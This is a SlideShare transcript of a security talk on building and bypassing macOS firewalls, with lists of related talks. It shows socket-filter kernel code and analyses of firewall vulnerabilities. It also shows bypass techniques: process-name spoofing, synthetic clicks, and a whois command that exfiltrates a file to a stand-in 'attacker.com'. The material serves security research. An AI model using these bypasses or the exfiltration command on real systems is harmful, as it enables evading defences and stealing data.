Linux Server Hardening - Steps by Steps
 
Manage distributed configuration and secrets with spring cloud and vault (Spr...
Manage distributed configuration and secrets with spring cloud and vault (Spr...Manage distributed configuration and secrets with spring cloud and vault (Spr...
Manage distributed configuration and secrets with spring cloud and vault (Spr...
 
I psec
I psecI psec
I psec
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation Vulnerabilities
 
Sydney Python Presentation (October 2010) - Splunk
Sydney Python Presentation (October 2010) - SplunkSydney Python Presentation (October 2010) - Splunk
Sydney Python Presentation (October 2010) - Splunk
 

Ähnlich wie Fire & Ice: Making and Breaking macOS Firewalls

26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
An overview of unix rootkits
An overview of unix rootkitsAn overview of unix rootkits
An overview of unix rootkitsUltraUploader
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewallsAkapo Damilola
 
OpenSSL Basic Function Call Flow
OpenSSL Basic Function Call FlowOpenSSL Basic Function Call Flow
OpenSSL Basic Function Call FlowWilliam Lee
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposPriyanka Aash
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Simone Onofri
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxPatricia Aas
 
Server hardening
Server hardeningServer hardening
Server hardeningTeja Babu
 
Finding target for hacking on internet is now easier
Finding target for hacking on internet is now easierFinding target for hacking on internet is now easier
Finding target for hacking on internet is now easierDavid Thomas
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones HijackingPriyanka Aash
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - FalconerTony Godfrey
 

Ähnlich wie Fire & Ice: Making and Breaking macOS Firewalls (20)

26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
An overview of unix rootkits
An overview of unix rootkitsAn overview of unix rootkits
An overview of unix rootkits
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewalls
 
OpenSSL Basic Function Call Flow
OpenSSL Basic Function Call FlowOpenSSL Basic Function Call Flow
OpenSSL Basic Function Call Flow
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium Sandbox
 
Server hardening
Server hardeningServer hardening
Server hardening
 
Finding target for hacking on internet is now easier
Finding target for hacking on internet is now easierFinding target for hacking on internet is now easier
Finding target for hacking on internet is now easier
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
 
100197
100197100197
100197
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 

Mehr von Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

Mehr von Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Kürzlich hochgeladen

Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 

Kürzlich hochgeladen (20)

Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 

Fire & Ice: Making and Breaking macOS Firewalls

  • 1. digita security Fire & Ice making and breaking mac firewalls
  • 2. WHOIS cybersecurity solutions for the macOS enterprise @patrickwardle synack digitansanasa
  • 3. Outline making breaking macos firewalls socket filter }bugs bypasses } ipc, rules, alerts
  • 4. digita security MAKING A FIREWALL filtering network traffic
  • 5. The Goal to monitor all network traffic; blocking unauthorized traffic while allowing trusted (legitimate) connections we'll focus on outgoing traffic (as Apple's built-in firewall is sufficient for incoming)C&C server malware infects system malware attempts to connect to C&C server or exfil data firewall detects unauthorized connection, alerting user } generically no a priori knowledge LuLu github.com/objective-see/LuLu
  • 6. Network Kernel Extensions & socket filters "Network kernel extensions (NKEs) provide a way to extend and modify the networking infrastructure of OS X" -developer.apple.com Apple's Network Kernel Extensions Programming Guide Socket Filter (NKE) "filter inbound or outbound traffic on a socket" -developer.apple.com socket operation allowed kernel mode
  • 7. Registering a Socket Filter the sflt_filter structure "A socket filter is registered by [first] filling out desired callbacks in the sflt_filter structure." OS X and iOS Kernel Programming struct sflt_filter { sflt_handle sf_handle; int sf_flags; char *sf_name; sf_unregistered_func sf_unregistered; sf_attach_func sf_attach; sf_detach_func sf_detach; sf_notify_func sf_notify; sf_getpeername_func sf_getpeername; sf_getsockname_func sf_getsockname; sf_data_in_func sf_data_in; sf_data_out_func sf_data_out; sf_connect_in_func sf_connect_in; sf_connect_out_func sf_connect_out; sf_bind_func sf_bind; sf_setoption_func sf_setoption; sf_getoption_func sf_getoption; .... struct sflt_filter (kpi_socketfilter.h) int sf_flags: set to SFLT_GLOBAL }callbacks (optional) attach data in/out detach
  • 8. Registering a Socket Filter the sflt_register function extern errno_t sflt_register(const struct sflt_filter *filter, int domain, int type, int protocol); //register socket filter // AF_INET domain, SOCK_STREAM type, TCP protocol sflt_register(&tcpFilterIPV4, AF_INET, SOCK_STREAM, IPPROTO_TCP) socket operation invoke sflt_register() for each domain, type, and protocol AF_INET/SOCK_STREAM/TCP AF_INET/SOCK_DGRAM/UDP AF_INET6/SOCK_STREAM/TCP etc... registering a socker filter
  • 9. Socket Filter Callbacks sf_attach_func: new sockets //callback for new sockets static kern_return_t attach(void **cookie, socket_t so); "The attach function...[is] called whenever [the] filter attaches itself to a socket. This happens...when the socket is created." OS X and iOS Kernel Programming the socket per socket data static kern_return_t attach(void **cookie, socket_t so){ //alloc cookie *cookie = (void*)OSMalloc(sizeof(struct cookieStruct), allocTag); //save rule action // values: allow/deny/ask ((struct cookieStruct*)(*cookie))->action = queryRule(proc_selfpid()); LuLu's attach function
  • 10. Socket Filter Callbacks sf_connect_out_func: outgoing connections //callback for outgoing (TCP) connections static kern_return_t connect_out(void *cookie, socket_t so, const struct sockaddr *to) "sf_connect_out_func is called to filter outbound connections. A protocol will call this before initiating an outbound connection." kpi_socketfilter.h the (attached) socket per socket data kern_return_t connect_out(void *cookie, socket_t so, const struct sockaddr *to){ //rule says 'allow'?
 if(RULE_STATE_ALLOW == cookie->ruleAction) return kIOReturnSuccess; //rule says 'block'? if(RULE_STATE_BLOCK == cookie->ruleAction) return kIOReturnError; //unknown (new) process.. LuLu's connect_out function remote address
  • 11. Callback: sf_connect_out_func handling an unknown process //nap time! IOLockSleep(ruleEventLock, &ruleEventLock, THREAD_ABORTSAFE); put thread to sleep sf_connect_out_func invoked on the thread of process connecting out! report event to user-mode daemon via shared queue //data queue IOSharedDataQueue *sharedDataQueue = NULL; //shared memory IOMemoryDescriptor *sharedMemoryDescriptor = NULL;
 //get memory descriptor // used in `clientMemoryForType` method sharedMemoryDescriptor = sharedDataQueue->getMemoryDescriptor(); ... //queue it up sharedDataQueue->enqueue_tail(&event, sizeof(firewallEvent));lulu (user-mode)
  • 12. Callback: sf_connect_out_func handling an unknown process daemon daemon, passes event to login item via XPC login item //process alert request from client // blocks for queue item, then sends to client -(void)alertRequest:(void (^)(NSDictionary* alert))reply { //read off queue self.dequeuedAlert = [eventQueue dequeue]; //return alert reply(self.dequeuedAlert); return; } login item displays alert ...& awaits for user's response allowdeny! <process> is trying to connect to <addr> alert
  • 13. Callback: sf_connect_out_func handling an unknown process " " user's response passed back to daemon (XPC) daemon save to rule database "allow" || "block" }kext send to kext (iokit) awake thread & apply response
  • 14. Process Classification known? unknown? socket operation //get process pid_t process = proc_selfpid(); socket filter callback(s), are invoked in context of process that initiated socket operation lulu (user-mode) generate code signing info (or hash) of process query rules database known process? tell kernel block/allow} unknown process? alert user/get response
  • 15. LuLu the free macOS firewall github.com/objective-see/LuLu full src code: rule's window alert installer
  • 17. The Goal access the network (e.g. connect out to a malicious C&C server or exfiltrate data) without being blocked by a firewall. C&C server infected host firewall 'aware' malware firewall (security) flaws firewall bypasses } product specific generic
  • 18. Firewall 'Aware' Malware is a firewall detected? yah; then gtfo "They were finally caught while attempting to upload a screenshot to one of their own servers, according to the report. A piece of security software called Little Snitch ... was installed on one of the information security employees’ laptops [at Palantir], and it flagged the suspicious upload attempt" -buzzfeed $ cat Twitter1 if [ -e /System/Library/Extensions/LittleSnitch.kext ] then cd "$DIR" ./Twitterrific exit 0 fi ... OSX.DevilRobber LittleSnitch (firewall) installed? ...yes; skip infecting the system! red team: caught!
  • 19. Firewall Vulnerabilities little snitch ring-0 heap overflow (wardle/cve-2016-8661) 32bit void* OSMalloc( uint32_t size ...); int copyin(..., vm_size_t nbytes ); offset 15 ... 8 7 6 5 4 3 2 1 0 value 1 0 0 0 0 0 0 0 2 64bit 64bit value: 0x100000002 32bit value: 0x100000002 vs. kernel heapheap buffer 
 [size: 2 bytes] rest of heap.... heap buffer 
 [size: 2 bytes] rest of heap.... 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 vm_size_t 
 is 64bits! kernel heapsub_FFFFFF7FA13EABB2 proc mov rbx, rsi mov rdi, [rbx+30h] ; user-mode struct mov rbx, rdi mov rdi, [rbx+8] ; size ... mov rsi, cs:allocTag call _OSMalloc ; malloc ... mov rdi, [rbx] ; in buffer mov rdx, [rbx+8] ; size mov rsi, rax ; out buffer (just alloc'd) call _copyin
  • 20. Firewall Vulnerabilities little snitch installer/updater local EoP (versions < 4.1) (lldb) po $rdx { /bin/rm -Rf "$DESTINATION" && /bin/cp -Rp "$SOURCE" "$DESTINATION" && /usr/sbin/chown -R root:wheel "$DESTINATION" && /bin/chmod -R a+rX,og-w "$DESTINATION"; } 2>&1 (lldb) po [[NSProcessInfo processInfo] environment] ... DESTINATION = "/Library/Little Snitch/Little Snitch Daemon.bundle"; SOURCE = "/Volumes/Little Snitch 4.0.6/Little Snitch Installer.app/Contents/Resources/ Little Snitch Daemon.bundle"; .dmg cp pkg/.../Little Snitch Daemon.bundle /Library/Little Snitch/ chown -R root:wheel 
 /Library/Little Snitch/ little snitch installer logic #_
  • 21. Bypassing RadioSilence ...don't trust a name! "The easiest network monitor and firewall for Mac...Radio Silence can stop any app from making network connections" -radiosilenceapp.com com.radiosilenceapp.nke.filter int _is_process_blacklisted(int arg0, int arg1) { return _is_process_or_ancestor_listed(r14, 0x0); } int _is_process_or_ancestor_listed(int arg0, int arg1) { //'launchd' can't be blacklisted _proc_name(arg0, &processName, 0x11); rax = _strncmp("launchd", &processName, 0x10); if (rax == 0x0) goto leave; ... return rax; } blacklist'ing check
  • 22. Bypassing RadioSilence ...don't trust a name! $ ~/Desktop/launchd google.com <HTML><BODY> <H1>301 Moved</H1> The document has moved <A HREF="http://www.google.com/">here</A>. </BODY></HTML> bypass: name malware: 'launchd' blacklist malware ...still connects out!
  • 23. Bypassing HandsOff ...don't trust a click! "Keep an eye on Internet connections from all applications as to expose the hidden connections. Prevent them from sending data without your consent" -handsoff $ curl google.com Allow " " void bypass(float X, float Y){
 //clicky clicky CGPostMouseEvent(CGPointMake(X, Y), true, 1, true); CGPostMouseEvent(CGPointMake(X, Y), true, 1, false); } synthetic click <HTML><HEAD> <TITLE>301 Moved</TITLE>
  • 24. Bypassing LuLu ...don't trust a system utility! "the free macOS firewall that aims to block unauthorized (outgoing) network traffic" -lulu //apple utils // may be abused, so trigger an alert NSString* const GRAYLISTED_BINARIES[] = { @"com.apple.nc", @"com.apple.curl", @"com.apple.ruby", @"com.apple.perl", @"com.apple.perl5", @"com.apple.python", @"com.apple.python2", @"com.apple.pythonw", @"com.apple.openssh", @"com.apple.osascript" }; is there an(other) system utility that we can abuse? LuLu's 'graylist'
  • 25. Bypassing LuLu ...don't trust a system utility! $ echo "exfil this data" > exfil.txt $ RHOST=attacker.com $ RPORT=12345 $ LFILE=file_to_send $ whois -h $RHOST -p $RPORT "`cat $LFILE`" LuLu(105): 
